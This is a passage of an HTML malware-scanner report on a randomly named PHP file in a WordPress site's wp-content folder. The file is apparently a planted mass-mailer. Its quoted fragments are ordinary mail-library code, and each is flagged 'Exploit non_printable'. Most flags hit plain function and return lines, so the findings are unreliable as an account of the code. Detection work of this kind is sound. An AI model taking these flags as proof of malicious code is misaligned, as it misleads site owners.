</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_180").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/e42KqOJ3bUV.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_181" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
